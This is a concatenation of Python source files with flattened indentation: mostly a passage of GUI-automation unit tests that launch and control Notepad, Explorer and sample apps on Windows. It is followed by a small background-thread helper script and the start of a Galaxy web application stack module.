app1.start(_notepad_exe())
app_conn = Application()
app_conn.connect(path=self.notepad_subpath)
self.assertEqual(app1.process, app_conn.process)
app_conn = Application()
if is_x64_Python() or not is_x64_OS():
app_conn.connect(path=r"c:\windows\system32\notepad.exe")
else:
app_conn.connect(path=r"c:\windows\syswow64\notepad.exe")
self.assertEqual(app1.process, app_conn.process)
accessible_modules = process_get_modules()
accessible_process_names = [os.path.basename(name.lower()) for process, name, cmdline in accessible_modules]
self.assertEquals('notepad.exe' in accessible_process_names, True)
app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_path_timeout(self):
"""Test that connect_() works with a path with timeout"""
app1 = Application()
def delayed_launch():
time.sleep(2)
app1.start(_notepad_exe())
thread = Thread(target=delayed_launch)
thread.start()
app_conn = Application()
app_conn.connect(path=_notepad_exe(), timeout=3)
self.assertEqual(app1.process, app_conn.process)
accessible_modules = process_get_modules()
accessible_process_names = [os.path.basename(name.lower()) for process, name, cmdline in accessible_modules]
self.assertEquals('notepad.exe' in accessible_process_names, True)
app1.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_path_timeout_problem(self):
"""Test that connect_() raise error when no process start"""
app1 = Application()
def delayed_launch():
time.sleep(1)
app1.start(_notepad_exe())
thread = Thread(target=delayed_launch)
thread.start()
self.assertRaises(ProcessNotFoundError, Application().connect, path=_notepad_exe(), timeout=0.5)
time.sleep(0.7)
app1.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_process_timeout_failed(self):
"""Test that connect_(process=...) raise error when set timeout"""
app1 = Application()
app1.start(_notepad_exe())
self.assertRaises(ProcessNotFoundError, Application().connect, process=0, timeout=0.5)
app1.UntitledNotepad.MenuSelect('File->Exit')
# def test_Connect(self):
# """Test that connect_() works with a path"""
# app1 = Application()
# app1.start_("notepad.exe")
#
# app_conn = Application()
# app_conn.connect_(path = r"system32\notepad.exe")
# self.assertEqual(app1.process, app_conn.process)
#
# app_conn = Application()
# app_conn.connect_(path = r"c:\windows\system32\notepad.exe")
# self.assertEqual(app1.process, app_conn.process)
#
# app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_process(self):
"""Test that connect_() works with a process"""
app1 = Application()
app1.start(_notepad_exe())
app_conn = Application()
app_conn.connect(process=app1.process)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_handle(self):
"""Test that connect_() works with a handle"""
app1 = Application()
app1.start(_notepad_exe())
handle = app1.UntitledNotepad.handle
app_conn = Application()
app_conn.connect(handle=handle)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_windowspec(self):
"""Test that connect_() works with a windowspec"""
app1 = Application()
app1.start(_notepad_exe())
#unused var: handle = app1.UntitledNotepad.handle
app_conn = Application()
try:
app_conn.connect(title = "Untitled - Notepad")
except findwindows.WindowAmbiguousError:
wins = findwindows.find_elements(active_only = True, title = "Untitled - Notepad")
app_conn.connect(handle = wins[0].handle)
except findwindows.ElementNotFoundError:
WaitUntil(30, 0.5, lambda: len(findwindows.find_elements(active_only = True, title = "Untitled - Notepad")) > 0)
wins = findwindows.find_elements(active_only = True, title = "Untitled - Notepad")
app_conn.connect(handle = wins[0].handle)
self.assertEqual(app1.process, app_conn.process)
app_conn.UntitledNotepad.MenuSelect('File->Exit')
def test_connect_raises(self):
"""Test that connect_() raises with invalid input"""
# try an argument that does not exist
self.assertRaises (
TypeError,
Application().connect, **{'not_arg': 23})
self.assertRaises (
RuntimeError,
Application().connect)
# try to pass an invalid process
self.assertRaises (
ProcessNotFoundError,
Application().connect, **{'process': 0})
# try to pass an invalid handle
self.assertRaises(
RuntimeError,
Application().connect, **{'handle' : 0})
# try to pass an invalid path
self.assertRaises(
ProcessNotFoundError,
Application().connect, **{'path': "no app here", 'timeout': 0.0})
def test_top_window(self):
"""Test that top_window_() works correctly"""
Timings.window_find_timeout = 5
app = Application()
self.assertRaises(AppNotConnected, app.top_window_)
app.start(_notepad_exe())
self.assertEqual(app.UntitledNotepad.handle, app.top_window_().handle)
app.UntitledNotepad.MenuSelect("Help->About Notepad")
self.assertEqual(app.AboutNotepad.handle, app.top_window_().handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.MenuSelect("File->Exit")
app.UntitledNotepad.WaitNot('exists')
self.assertRaises(RuntimeError, app.top_window_)
def test_active_window(self):
"""Test that active_() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.active_)
self.assertRaises(AppNotConnected, app.is64bit)
app.start(_notepad_exe())
app.UntitledNotepad.Wait('ready')
self.assertEqual(app.active_().handle, app.UntitledNotepad.handle)
app.UntitledNotepad.MenuSelect("File->Exit")
app.UntitledNotepad.WaitNot('exists')
self.assertRaises(RuntimeError, app.active_)
def test_cpu_usage(self):
"""Verify that cpu_usage() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.cpu_usage)
app.start(_notepad_exe())
self.assertEquals(0.0 <= app.cpu_usage() <= 100.0, True)
app.UntitledNotepad.MenuSelect("File->Exit")
app.UntitledNotepad.WaitNot('exists')
def test_wait_cpu_usage_lower(self):
"""Test that wait_cpu_usage_lower() works correctly"""
if is_x64_Python() != is_x64_OS():
return None
Application().Start(r'explorer.exe')
def _cabinetwclass_exist():
"Verify if at least one active 'CabinetWClass' window is created"
l = findwindows.find_elements(active_only = True, class_name = 'CabinetWClass')
return (len(l) > 0)
WaitUntil(40, 0.5, _cabinetwclass_exist)
handle = findwindows.find_elements(active_only = True, class_name = 'CabinetWClass')[-1].handle
window = WindowSpecification({'handle': handle, 'backend': 'win32', })
explorer = Application().Connect(process = window.process_id())
try:
explorer.WaitCPUUsageLower(threshold = 1.5, timeout = 60, usage_interval = 2)
window.AddressBandRoot.ClickInput()
window.TypeKeys(r'Control Panel\Programs\Programs and Features', with_spaces=True, set_foreground=True)
window.TypeKeys(r'{ENTER}', set_foreground = False)
WaitUntil(40, 0.5, lambda: len(findwindows.find_elements(active_only = True,
title = 'Programs and Features',
class_name='CabinetWClass')) > 0)
explorer.WaitCPUUsageLower(threshold = 1.5, timeout = 60, usage_interval = 2)
installed_programs = window.FolderView.texts()[1:]
programs_list = ','.join(installed_programs)
if ('Microsoft' not in programs_list) and ('Python' not in programs_list):
hwndwrapper.ImageGrab.grab().save(r'explorer_screenshot.jpg')
hwndwrapper.ActionLogger().log('\ninstalled_programs:\n')
for prog in installed_programs:
hwndwrapper.ActionLogger().log(prog)
self.assertEqual(('Microsoft' in programs_list) or ('Python' in programs_list), True)
finally:
window.Close(2.0)
if UIA_support:
def test_wait_cpu_usage_lower_uia(self):
"""Test that wait_cpu_usage_lower() works correctly for UIA"""
app = Application(backend='uia')
app.start('notepad.exe')
try:
app.wait_cpu_usage_lower(threshold = 1.5, timeout = 30, usage_interval = 2)
finally:
app.kill()
app.cpu_usage = mock.Mock(return_value=10)
self.assertRaises(
RuntimeError, app.wait_cpu_usage_lower,
threshold = 9.0, timeout = 5, usage_interval = 0.5
)
# def test_wait_for_idle_exception(self):
# """Test that method start() raises an exception when wait for idle failed"""
# app = Application()
# self.assertRaises(Exception, app.start, 'cmd.exe')
# # TODO: test and fix the case when cmd.exe can't be killed by app.kill()
def test_windows(self):
"""Test that windows_() works correctly"""
Timings.window_find_timeout = 5
app = Application()
self.assertRaises(AppNotConnected, app.windows_, **{'title' : 'not connected'})
app.start('notepad.exe')
self.assertRaises(ValueError, app.windows_, **{'backend' : 'uia'})
notepad_handle = app.UntitledNotepad.handle
self.assertEquals(app.windows_(visible_only = True), [notepad_handle])
app.UntitledNotepad.MenuSelect("Help->About Notepad")
aboutnotepad_handle = app.AboutNotepad.handle
self.assertEquals(
app.windows_(visible_only = True, enabled_only = False),
[aboutnotepad_handle, notepad_handle])
app.AboutNotepad.OK.Click()
app.UntitledNotepad.MenuSelect("File->Exit")
def test_window(self):
"""Test that window_() works correctly"""
app = Application()
self.assertRaises(AppNotConnected, app.window_, **{'title' : 'not connected'})
app.start(_notepad_exe())
self.assertRaises(ValueError, app.windows_, **{'backend' : 'uia'})
title = app.window_(title = "Untitled - Notepad")
title_re = app.window_(title_re = "Untitled[ -]+Notepad")
classname = app.window_(class_name = "Notepad")
classname_re = app.window_(class_name_re = "Not..ad")
handle = app.window_(handle = title.handle)
bestmatch = app.window_(best_match = "Untiotled Notepad")
self.assertNotEqual(title.handle, None)
self.assertNotEqual(title.handle, 0)
self.assertEqual(title.handle, title_re.handle)
self.assertEqual(title.handle, classname.handle)
self.assertEqual(title.handle, classname_re.handle)
self.assertEqual(title.handle, handle.handle)
self.assertEqual(title.handle, bestmatch.handle)
app.UntitledNotepad.MenuSelect("File->Exit")
def test_getitem(self):
"""Test that __getitem__() works correctly"""
Timings.window_find_timeout = 5
app = Application()
app.start(_notepad_exe())
self.assertRaises(Exception, app['blahblah'])
self.assertRaises(
findbestmatch.MatchError,
app['blahblah']['not here'].__getitem__, 'handle')
self.assertEqual(
app[u'Unt\xeftledNotepad'].handle,
app.window_(title = "Untitled - Notepad").handle)
app.UntitledNotepad.MenuSelect("Help->About Notepad")
self.assertEqual(
app['AboutNotepad'].handle,
app.window_(title = "About Notepad").handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.MenuSelect("File->Exit")
def test_getattribute(self):
"""Test that __getattribute__() works correctly"""
Timings.window_find_timeout = 5
app = Application()
app.start(_notepad_exe())
self.assertRaises(
findbestmatch.MatchError,
app.blahblah.__getattribute__, 'handle')
self.assertEqual(
app.UntitledNotepad.handle,
app.window_(title = "Untitled - Notepad").handle)
app.UntitledNotepad.MenuSelect("Help->About Notepad")
# I think it's OK that this no longer raises a matcherror
# just because the window is not enabled - doesn't mean you
# should not be able to access it at all!
#self.assertRaises(findbestmatch.MatchError,
# app.Notepad.__getattribute__, 'handle')
self.assertEqual(
app.AboutNotepad.handle,
app.window(title = "About Notepad").handle)
app.AboutNotepad.Ok.Click()
app.UntitledNotepad.MenuSelect("File->Exit")
def test_kill_(self):
"""test killing the application"""
app = Application()
app.start(_notepad_exe())
app.UntitledNotepad.Edit.type_keys("hello")
app.UntitledNotepad.MenuSelect("File->Print...")
#app.Print.FindPrinter.Click() # Vasily: (Win7 x64) "Find Printer" dialog is from splwow64.exe process
#app.FindPrinters.Stop.Click()
app.kill_()
self.assertRaises(AttributeError, app.UntitledNotepad.Edit)
def test_process_is_running(self):
"""Tests process is running and wait for exit function"""
app = Application()
app.start(_notepad_exe())
app.UntitledNotepad.wait("ready")
self.assertTrue(app.is_process_running())
self.assertRaises(TimeoutError, lambda: app.wait_for_process_exit(timeout=5, retry_interval=1))
app.kill()
app.wait_for_process_exit()
self.assertFalse(app.is_process_running())
def test_should_return_not_running_if_not_started(self):
"""Tests that works on new instance
is_process_running/wait_for_process_exit can be called on not started/disconnected instance
"""
app = Application()
app.wait_for_process_exit(timeout=10, retry_interval=1)
self.assertFalse(app.is_process_running())
class TestInheritedApp(Application):
"""Our inherited version of class"""
def test_method(self):
"""This method should be called without any issues"""
return self is not None
def test_application_inheritance(self):
"""Test that Application class can be inherited and has it's own methods"""
app = ApplicationTestCases.TestInheritedApp()
self.assertTrue(app.test_method())
class WindowSpecificationTestCases(unittest.TestCase):
"""Unit tests for the application.Application class"""
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application().start("Notepad")
self.dlgspec = self.app.UntitledNotepad
self.ctrlspec = self.app.UntitledNotepad.Edit
def tearDown(self):
"""Close the application after tests"""
# close the application
#self.app.UntitledNotepad.MenuSelect("File->Exit")
self.app.kill_()
def test__init__(self):
"""Test creating a new spec by hand"""
wspec = WindowSpecification(
dict(
best_match = u"UntitledNotepad",
process = self.app.process)
)
self.assertEquals(
wspec.window_text(),
u"Untitled - Notepad")
def test__call__(self):
"""Test that __call__() correctly raises an error"""
self.assertRaises(AttributeError, self.dlgspec)
self.assertRaises(AttributeError, self.ctrlspec)
# no best_match!
wspec = WindowSpecification(
dict(title = u"blah", process = self.app.process) )
self.assertRaises(AttributeError, wspec)
def test_wrapper_object(self):
"""Test that we can get a control"""
self.assertEquals(True, isinstance(self.dlgspec, WindowSpecification))
self.assertEquals(
True,
isinstance(self.dlgspec.WrapperObject(), hwndwrapper.HwndWrapper)
)
def test_window(self):
"""test specifying a sub window of an existing specification"""
sub_spec = self.dlgspec.ChildWindow(class_name = "Edit")
sub_spec_legacy = self.dlgspec.Window_(class_name = "Edit")
self.assertEquals(True, isinstance(sub_spec, WindowSpecification))
self.assertEquals(sub_spec.class_name(), "Edit")
self.assertEquals(sub_spec_legacy.class_name(), "Edit")
def test__getitem__(self):
"""test item access of a windowspec"""
self.assertEquals(
True,
isinstance(self.dlgspec['Edit'], WindowSpecification)
)
self.assertEquals(self.dlgspec['Edit'].class_name(), "Edit")
self.assertRaises(AttributeError, self.ctrlspec.__getitem__, 'edit')
def test_getattr(self):
"""Test getting attributes works correctly"""
self.assertEquals(
True,
isinstance(self.dlgspec.Edit, WindowSpecification)
)
self.assertEquals(self.dlgspec.Edit.class_name(), "Edit")
# check that getting a dialog attribute works correctly
self.assertEquals(
"Notepad",
self.dlgspec.class_name())
# Check handling 'parent' as a WindowSpecification
spec = self.ctrlspec.child_window(parent=self.dlgspec)
self.assertEqual(spec.class_name(), "Edit")
def test_exists(self):
"""Check that windows exist"""
self.assertEquals(True, self.dlgspec.Exists())
self.assertEquals(True, self.dlgspec.Exists(0))
self.assertEquals(True, self.ctrlspec.Exists())
# TODO: test a control that is not visible but exists
#self.assertEquals(True, self.app.DefaultIME.Exists())
start = timestamp()
self.assertEquals(False, self.app.BlahBlah.Exists(timeout=.1))
self.assertEquals(True, timestamp() - start < .3)
start = timestamp()
self.assertEquals(False, self.app.BlahBlah.exists(timeout=3))
self.assertEquals(True, 2.7 < timestamp() - start < 3.3)
def test_exists_timing(self):
"""test the timing of the exists method"""
# try ones that should be found immediately
start = timestamp()
self.assertEquals(True, self.dlgspec.Exists())
self.assertEquals(True, timestamp() - start < .3)
start = timestamp()
self.assertEquals(True, self.ctrlspec.Exists())
self.assertEquals(True, timestamp() - start < .3)
# try one that should not be found
start = timestamp()
self.assertEquals(True, self.dlgspec.Exists(.5))
timedif = timestamp() - start
self.assertEquals(True, .49 > timedif < .6)
def test_wait(self):
"""test the functionality and timing of the wait method"""
allowable_error = .2
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait("enaBleD "))
time_taken = (timestamp() - start)
if not 0 <= time_taken < (0 + 2 * allowable_error):
self.assertEqual(.02, time_taken)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait(" ready"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait(" exiSTS"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait(" VISIBLE "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait(" ready enabled"))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait("visible exists "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait("exists "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
start = timestamp()
self.assertEqual(self.dlgspec.WrapperObject(), self.dlgspec.Wait("actIve "))
self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
self.assertRaises(SyntaxError, self.dlgspec.Wait, "Invalid_criteria")
def test_wait_non_existing(self):
"""test timing of the wait method for non-existing element"""
allowable_error = .2
start = timestamp()
self.assertRaises(TimeoutError, self.app.BlahBlah.wait, 'exists')
expected = Timings.window_find_timeout
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
def test_wait_invisible(self):
"""test timing of the wait method for non-existing element and existing invisible one"""
# TODO: re-use an MFC sample for this test
allowable_error = .2
start = timestamp()
self.assertRaises(TimeoutError, self.app.BlahBlah.wait, 'visible')
expected = Timings.window_find_timeout
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
# make sure Status Bar is not visible
status_bar_menu = self.app.UntitledNotepad.menu().item('&View').sub_menu().item('&Status Bar')
if status_bar_menu.is_checked():
status_bar_menu.select()
# check that existing invisible control is still found with 'exists' criterion
status_bar_spec = self.app.UntitledNotepad.child_window(class_name="msctls_statusbar32", visible_only=False)
self.assertEqual('StatusBar', status_bar_spec.wait('exists').friendly_class_name())
start = timestamp()
self.assertRaises(TimeoutError, status_bar_spec.wait, 'exists visible')
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, status_bar_spec.wait, 'visible exists')
self.assertEqual(True, expected - allowable_error <= (timestamp() - start) < expected + allowable_error)
def test_wait_not(self):
"""
Test that wait not fails for all the following
* raises and error when criteria not met
* timing is close to the timeout value
"""
allowable_error = .16
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, "enaBleD ", .1, .05)
taken = timestamp() - start
if .1 < (taken) > .1 + allowable_error:
self.assertEqual(.12, taken)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, " ready", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, " exiSTS", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, " VISIBLE ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, " ready enabled", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, "visible exists ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, "exists ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
start = timestamp()
self.assertRaises(TimeoutError, self.dlgspec.WaitNot, "actIve ", .1, .05)
self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
self.assertRaises(SyntaxError, self.dlgspec.WaitNot, "Invalid_criteria")
# def test_wait_ready(self):
# """Make sure the friendly class is set correctly"""
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitReady(.1, .05))
#
# # it it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
#
# def testWaitNotReady(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotReady, .1, .05)
#
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
#
#
# def testWaitEnabled(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitEnabled(.1, .05))
#
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
#
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
#
# def testWaitNotEnabled(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotEnabled, .1, .05)
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
#
# def testWaitVisible(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitVisible(.1, .05))
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(0, timestamp() - start)
# #self.assertEqual(True, 0 <= (timestamp() - start) < 0 + allowable_error)
#
# def testWaitNotVisible(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotVisible, .1, .05)
# # it it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# def testWaitExists(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertEqual(self.dlgspec.ctrl_(), self.dlgspec.WaitExists(.1, .05))
#
# # it it didn't finish in the allocated time then raise an error
# # we assertEqual to something that we know is not right - to get a
# # better error report
# if not 0 <= (timestamp() - start) < 0 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
#
# def testWaitNotExists(self):
# "Make sure the friendly class is set correctly"
#
# allowable_error = .02
#
# start = timestamp()
# self.assertRaises(RuntimeError, self.dlgspec.WaitNotExists, .1, .05)
# if not .1 <= (timestamp() - start) < .1 + allowable_error:
# self.assertEqual(.1, timestamp() - start)
# #self.assertEqual(True, .1 <= (timestamp() - start) < .1 + allowable_error)
def test_depth(self):
"""Test that descendants() with depth works correctly"""
self.dlgspec.menu_select("Format -> Font")
self.assertNotEqual(
len(self.app['Font'].descendants(depth=1)),
len(self.app['Font'].descendants(depth=2)))
def test_print_control_identifiers(self):
"""Make sure print_control_identifiers() doesn't crash"""
self.dlgspec.print_control_identifiers()
self.ctrlspec.print_control_identifiers()
def test_print_control_identifiers_file_output(self):
"""Make sure print_control_identifiers() creates correct file"""
output_filename = "test_print_control_identifiers.txt"
self.dlgspec.print_ctrl_ids(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue("'Untitled - NotepadEdit'" in content
and "'Edit'" in content)
self.assertTrue("child_window(class_name=\"msctls_statusbar32\"" in content)
os.remove(output_filename)
else:
self.fail("print_control_identifiers can't create a file")
self.ctrlspec.dump_tree(filename=output_filename)
if os.path.isfile(output_filename):
with open(output_filename, "r") as test_log_file:
content = str(test_log_file.readlines())
self.assertTrue("child_window(class_name=\"Edit\")" in content)
os.remove(output_filename)
else:
self.fail("print_control_identifiers can't create a file")
def test_find_elements_re(self):
"""Test for bug #90: A crash in 'find_elements' when called with 'title_re' argument"""
self.dlgspec.Wait('visible')
windows = findwindows.find_elements(title_re = "Untitled - Notepad")
self.assertTrue(len(windows) >= 1)
class WaitUntilDecoratorTests(unittest.TestCase):
"""Unit tests for always_wait_until and always_wait_until_passes decorators"""
def test_always_wait_until_decorator_success(self):
"""Test always_wait_until_decorator success"""
@always_wait_until(4, 2)
def foo():
return True
self.assertTrue(foo())
def test_always_wait_until_decorator_failure(self):
"""Test wait_until_decorator failure"""
@always_wait_until(4, 2)
def foo():
return False
self.assertRaises(TimeoutError, foo)
def test_always_wait_until_passes_decorator_success(self):
"""Test always_wait_until_passes_decorator success"""
@always_wait_until_passes(4, 2)
def foo():
return True
self.assertTrue(foo())
def test_always_wait_until_passes_decorator_failure(self):
"""Test always_wait_until_passes_decorator failure"""
@always_wait_until_passes(4, 2)
def foo():
raise Exception("Unexpected Error in foo")
self.assertRaises(TimeoutError, foo)
class MultiLevelWindowSpecificationTests(unittest.TestCase):
"""Unit tests for multi-level (3+) WindowSpecification objects"""
if UIA_support:
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.slow()
self.app = Application(backend='uia').start(os.path.join(mfc_samples_folder, u"RowList.exe"))
self.dlg = self.app.RowListSampleApplication
def tearDown(self):
"""Close the application after tests"""
self.dlg.CloseButton.click()
self.dlg.wait_not('visible')
def test_3level_specification(self):
"""Test that controls can be accessed by 3 levels of attributes"""
self.dlg.Toolbar.About.click()
self.dlg.AboutRowList.OK.click()
#self.dlg.AboutRowList.wait_not('visible') # XXX: it takes more than 50 seconds!
else: # Win32
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend='win32').start(os.path.join(mfc_samples_folder, u"CmnCtrl3.exe"))
self.dlg = self.app.CommonControlsSample
def tearDown(self):
"""Close the application after tests"""
self.dlg.SendMessage(win32defines.WM_CLOSE)
def test_4level_specification(self):
"""Test that controls can be accessed by 4 levels of attributes"""
self.assertEqual(self.dlg.CPagerCtrl.Pager.Toolbar.button_count(), 12)
class DesktopWindowSpecificationTests(unittest.TestCase):
"""Unit tests for Desktop object"""
if UIA_support:
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.slow()
self.app = Application().start('explorer.exe "' + mfc_samples_folder_32 + '"')
self.desktop = Desktop(backend='uia')
def tearDown(self):
"""Close the application after tests"""
self.desktop.MFC_samplesDialog.CloseButton.click()
self.desktop.MFC_samplesDialog.wait_not('visible')
def test_folder_list(self):
"""Test that ListViewWrapper returns correct files list in explorer.exe"""
files_list = self.desktop.MFC_samplesDialog.Shell_Folder_View.Items_View.wrapper_object()
self.assertEqual([item.window_text() for item in files_list.get_items()],
[u'x64', u'BCDialogMenu.exe', u'CmnCtrl1.exe', u'CmnCtrl2.exe', u'CmnCtrl3.exe',
u'CtrlTest.exe', u'mfc100u.dll', u'RebarTest.exe', u'RowList.exe', u'TrayMenu.exe'])
self.assertEqual(files_list.item('RebarTest.exe').window_text(), 'RebarTest.exe')
def test_set_backend_to_window_uia(self):
"""Set backend to method window(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.window(backend='uia', title='MFC_samplesDialog')
with self.assertRaises(ValueError):
self.desktop.window(backend='win32', title='MFC_samplesDialog')
def test_get_list_of_windows_uia(self):
"""Test that method .windows() returns a non-empty list of windows"""
dlgs = self.desktop.windows()
self.assertTrue(len(dlgs) > 1)
def test_set_backend_to_windows_uia(self):
"""Set backend to method windows, except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.windows(backend='win32')
with self.assertRaises(ValueError):
self.desktop.windows(backend='uia')
def test_only_visible_windows_uia(self):
"""Set visible_only to the method windows"""
dlgs = self.desktop.windows(visible_only=True)
self.assertTrue(all([win.is_visible() for win in dlgs]))
def test_only_enable_windows_uia(self):
"""Set enable_only to the method windows"""
dlgs = self.desktop.windows(enabled_only=True)
self.assertTrue(all([win.is_enabled() for win in dlgs]))
else: # Win32
def setUp(self):
"""Set some data and ensure the application is in the state we want"""
Timings.defaults()
self.app = Application(backend='win32').start(os.path.join(mfc_samples_folder, u"CmnCtrl3.exe"))
self.desktop = Desktop(backend='win32')
self.window_title = 'Common Controls Sample'
def tearDown(self):
"""Close the application after tests"""
self.desktop.window(title=self.window_title, process=self.app.process).SendMessage(win32defines.WM_CLOSE)
def test_simple_access_through_desktop(self):
"""Test that controls can be accessed by 4 levels of attributes"""
dlg = self.desktop.window(title=self.window_title, process=self.app.process)
self.assertEqual(dlg.Pager.Toolbar.button_count(), 12)
def test_set_backend_to_window_win32(self):
"""Set backend to method window(), except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.window(backend='uia', title=self.window_title, process=self.app.process)
with self.assertRaises(ValueError):
self.desktop.window(backend='win32', title=self.window_title, process=self.app.process)
def test_get_list_of_windows_win32(self):
"""Test that method .windows() returns a non-empty list of windows"""
dlgs = self.desktop.windows()
self.assertTrue(len(dlgs) > 1)
window_titles = [win_obj.window_text() for win_obj in dlgs]
self.assertTrue(self.window_title in window_titles)
def test_set_backend_to_windows_win32(self):
"""Set backend to method windows, except exception ValueError"""
with self.assertRaises(ValueError):
self.desktop.windows(backend='win32')
with self.assertRaises(ValueError):
self.desktop.windows(backend='uia')
def test_only_visible_windows_win32(self):
"""Set visible_only to the method windows"""
dlgs = self.desktop.windows(visible_only=True)
self.assertTrue(all([win.is_visible() for win in dlgs]))
def test_only_enable_windows_win32(self):
"""Set enable_only to the method windows"""
dlgs = self.desktop.windows(enabled_only=True)
self.assertTrue(all([win.is_enabled() for win in dlgs]))
if __name__ == "__main__":
unittest.main()
|
backgroundtask.py
|
import threading
import time
def your_function():
print("your code")
class Execute(object):
# set interval time
def __init__(self, interval=10):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
# if it is equal to false background task is not active
thread.daemon = True
thread.start()
def run(self):
try:
while True:
# Do something
your_function()
time.sleep(self.interval)
except Exception:
pass
teste = Execute()
|
__init__.py
|
"""Web application stack operations."""
import logging
import multiprocessing
import os
import sys
import threading
from typing import (
Callable,
FrozenSet,
List,
Optional,
Type,
)
from galaxy.util.facts import get_facts
from .handlers import HANDLER_ASSIGNMENT_METHODS
log = logging.getLogger(__name__)
class ApplicationStackLogFilter(logging.Filter):
def filter(self, record):
return True
class ApplicationStack:
name: Optional[str] = None
prohibited_middleware: FrozenSet[str] = frozenset()
log_filter_class: Type[logging.Filter] = ApplicationStackLogFilter
log_format = "%(name)s %(levelname)s %(asctime)s [pN:%(processName)s,p:%(process)d,tN:%(threadName)s] %(message)s"
# TODO: this belongs in the pool configuration
server_name_template = "{server_name}"
default_app_name = "main"
@classmethod
def log_filter(cls):
return cls.log_filter_class()
@classmethod
